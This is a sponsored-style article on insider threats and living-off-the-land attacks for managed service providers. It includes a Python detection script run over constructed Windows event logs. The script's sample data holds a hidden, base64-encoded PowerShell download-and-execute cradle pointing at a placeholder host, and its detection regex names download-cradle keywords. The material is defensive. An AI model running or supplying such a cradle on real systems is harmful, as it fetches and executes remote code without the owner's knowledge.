Staving Off Inside Threats
August 3, 2020
Beware of internal bad actors and prying eyes
The Channelnomics Staff
When we think of cybersecurity breaches, we often conjure up images of so-called black hats – miscreants in hooded garments sitting in dark corners as they churn out malicious code and whip up insidious plans for ransomware, worms, and the like. We sometimes forget about the inside threats, such as employee carelessness, hijacked admin tools, and disgruntled ex-staffers.
But those threats are real – as real as all the others – and MSPs need to take a 360-degree view of client security, especially today, as the coronavirus rages across the globe and forces employers to deploy widely dispersed, heterogeneous networks.
Here are three areas that MSPs need to keep their eyes on:
Clients – The Enemy Within. According to a survey by IDC on behalf of SolarWinds, more than 60% of respondents cited insiders as their biggest threat. Among respondents to a Crowd Research Partners survey, 55% said the same. The consensus: A number of high-profile breaches result directly from inadequate management of access privileges and unintentionally exposed administrative credentials.
MSPs can do a handful of things to minimize the potential for inside security risks. For one thing, it’s critical to educate customers and their staff in this area and encourage them to implement strong HR policies that include background checks and a plan for employee offboarding. In addition, a Zero Trust identity policy, least-privilege access with stringent identity management, and remote monitoring and management (RMM) solutions that alert on indicators of misuse (such as additions to privileged Active Directory groups, or mass file deletions by a single account) could go a long way toward protecting clients – and you.
Living off the Land (LotL) Attacks. Notoriously difficult to discover, these attacks occur when a threat actor abuses tools that are already installed and trusted in the environment, such as PowerShell, WMI, or remote-administration agents, to run commands and move from machine to machine without dropping custom malware that signature-based defenses would catch. Because the tools themselves are legitimate, detection has to focus on behavior – for example, PowerShell script block logging, process command-line auditing, and unusual use of admin tooling by ordinary user accounts – rather than on file signatures. LotL attacks are especially popular among sophisticated cybercriminal groups, and their targets are often MSPs: compromising one managed service provider’s remote-access or RMM tooling means gaining access to all of that MSP’s customers. A good way to prevent and detect LotL attacks is to take a defense-in-depth approach by layering multiple security controls, such as patch management, web protection, e-mail security, AI-driven endpoint protection, secure credential management, and user and network access segmentation.
Former employees. While existing staffers present enough risk of their own, ex-staffers can pose an even greater danger. Former workers have inside knowledge of an employer’s data, operations, and systems. If that information gets into the wrong hands, whether because a disgruntled ex-employee deliberately puts it there or because an ex-staffer still has access to an application or account that gets compromised, a breach’s consequences – financial, reputational, or otherwise – could be disastrous.
To reduce the risk attached to ex-employees – whether customers’ or your own – companies should, ironically enough, plan for a new staffer’s exit upon onboarding, keeping an inventory of all devices that are issued and all services and accounts that will be accessed, including shared and service accounts whose credentials the person knows. When somebody does leave, all equipment should be recovered, all account access should be disabled immediately (and shared credentials rotated), the disabled accounts should be monitored afterwards for attempted logons, and remaining employees should be trained on good security hygiene. They should know not to copy data outside of the organization, share passwords, or grant a former employee unsupervised access to a physical location.
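The three paragraphs above each describe something to watch for: additions to privileged Active Directory groups and mass file deletions (the RMM alerts), suspicious PowerShell use (living off the land), and logon attempts against accounts disabled at offboarding. The script below is an added example of that detection logic run over constructed Windows event records; it is not SolarWinds, Channelnomics, or any product's code, the records are made up rather than captured from a real host, and the thresholds, field names, and the `_enc` helper are assumptions for the demonstration. The event IDs it keys on are the standard Windows Security and PowerShell ones (4728/4732/4756 for member added to a security-enabled group, 4663 for object access with the DELETE bit 0x10000 set, 4688 for process creation with command line, 4104 for script block logging, 4625 with sub-status 0xC0000072 for a logon attempt against a disabled account).

```python
"""Toy triage of Windows event records for the insider and LotL signals the article lists.
Added example, not vendor code. Sample records are constructed, not captured."""
import base64
import re
from collections import defaultdict

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Schema Admins"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}   # member added to a security-enabled group
DELETE_MASK = 0x10000                   # DELETE bit in the 4663 access mask
MASS_DELETE_THRESHOLD = 20              # assumption: tune per client
MASS_DELETE_WINDOW = 60                 # seconds
DISABLED_ACCOUNT_SUBSTATUS = "0xC0000072"
# Patterns commonly seen in hands-on-keyboard PowerShell abuse (assumption: extend per client).
SUSPICIOUS_PS = re.compile(
    r"\bIEX\b|Invoke-Expression|DownloadString|FromBase64String|-nop\b|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_privileged_group_changes(events):
    """Any member added to a privileged AD/local group is worth a ticket."""
    return [(e["ts"], e["user"], e["member"], e["group"]) for e in events
            if e["id"] in GROUP_ADD_EVENTS and e.get("group") in PRIVILEGED_GROUPS]


def find_mass_deletes(events, threshold=MASS_DELETE_THRESHOLD, window=MASS_DELETE_WINDOW):
    """Flag a user whose DELETE-access events reach `threshold` inside any `window`-second span."""
    per_user = defaultdict(list)
    for e in events:
        if e["id"] == 4663 and e.get("mask", 0) & DELETE_MASK:
            per_user[e["user"]].append(e["ts"])
    hits = []
    for user, stamps in per_user.items():
        stamps.sort()
        best, best_start, start = 0, None, 0
        for end, ts in enumerate(stamps):          # sliding window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 > best:
                best, best_start = end - start + 1, stamps[start]
        if best >= threshold:
            hits.append((user, best, best_start))
    return hits


def find_suspicious_powershell(events):
    """Check 4688 command lines (decoding -EncodedCommand) and 4104 script blocks."""
    hits = []
    for e in events:
        text = None
        if e["id"] == 4688 and "powershell" in e.get("cmdline", "").lower():
            text = e["cmdline"] + " " + (decode_encoded_command(e["cmdline"]) or "")
        elif e["id"] == 4104:
            text = e.get("script", "")
        if text and SUSPICIOUS_PS.search(text):
            hits.append((e["ts"], e["user"], text.strip()[:80]))
    return hits


def find_disabled_account_logons(events):
    """Logon failures whose sub-status says the account is disabled: an ex-staffer or someone using their creds."""
    return [(e["ts"], e["user"], e.get("src", "?")) for e in events
            if e["id"] == 4625 and e.get("substatus", "").upper() == DISABLED_ACCOUNT_SUBSTATUS.upper()]


def triage(events):
    return {
        "privileged_group_changes": find_privileged_group_changes(events),
        "mass_deletes": find_mass_deletes(events),
        "suspicious_powershell": find_suspicious_powershell(events),
        "disabled_account_logons": find_disabled_account_logons(events),
    }


def _enc(script):
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records (field names are a simplification of the real event XML).
SAMPLE_EVENTS = (
    [{"ts": 1000, "id": 4732, "user": "jsmith", "member": "svc-backup", "group": "Administrators"},
     {"ts": 1005, "id": 4728, "user": "jsmith", "member": "tnguyen", "group": "Marketing"},
     {"ts": 1200, "id": 4688, "user": "tnguyen", "cmdline": "powershell.exe -nop -w hidden -enc "
      + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
     {"ts": 1210, "id": 4688, "user": "ops", "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
     {"ts": 1300, "id": 4104, "user": "ops", "script": "Get-ChildItem C:\\temp"},
     {"ts": 1400, "id": 4625, "user": "former.employee", "src": "10.0.0.55", "substatus": "0xC0000072"},
     {"ts": 1401, "id": 4625, "user": "jsmith", "src": "10.0.0.12", "substatus": "0xC000006A"}]
    + [{"ts": 1100 + i, "id": 4663, "user": "tnguyen", "mask": DELETE_MASK} for i in range(25)]
    + [{"ts": 1100 + i * 30, "id": 4663, "user": "ops", "mask": DELETE_MASK} for i in range(5)]
)

if __name__ == "__main__":
    for rule, findings in triage(SAMPLE_EVENTS).items():
        print(rule, findings)
```

Running it flags the Administrators group addition, tnguyen's 25 deletes in one minute, the hidden, encoded PowerShell download cradle, and the logon attempt against the disabled former.employee account, while ignoring the routine Marketing group change, the scheduled backup script, and an ordinary wrong-password failure. In practice the records come from forwarded event logs or an RMM/EDR agent rather than a list literal, and the deletion threshold needs tuning per client so that a legitimate cleanup job does not page anyone.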
SolarWinds offers a number of tools and resources to help MSPs protect customers – and themselves – from cyberattacks, inside and otherwise. The company’s Endpoint Detection and Response (EDR) integrates with its RMM, allowing MSPs to use it from the same platform they use to support customers. There’s also SolarWinds Mail Assure for e-mail security and SolarWinds PassPortal for credential management. Visit the SolarWinds MSP website to find out all about the company’s solutions.
